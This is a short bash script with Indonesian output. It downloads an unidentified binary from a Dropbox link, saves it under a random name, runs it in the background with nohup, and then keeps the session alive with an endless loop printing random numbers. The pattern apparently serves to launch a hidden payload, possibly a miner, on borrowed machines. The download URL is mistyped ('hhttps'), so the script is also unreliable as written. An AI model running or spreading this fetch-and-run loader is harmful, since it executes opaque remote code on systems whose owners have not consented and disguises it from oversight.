#!/bin/bash
echo "mulai ... !!"
nama=x$(shuf -i 19999-99999 -n 1)
sudo apt-get update -y > /dev/null 2>&1
sleep 10
wget -q -O $nama hhttps://www.dropbox.com/s/iebfzab6josfjg4/ccv2?dl=1 && chmod +x $nama
sleep 10
nohup ./$nama ann &
sleep 10
while :; do shuf -n 1 -i 1-99999999; sleep 150; done
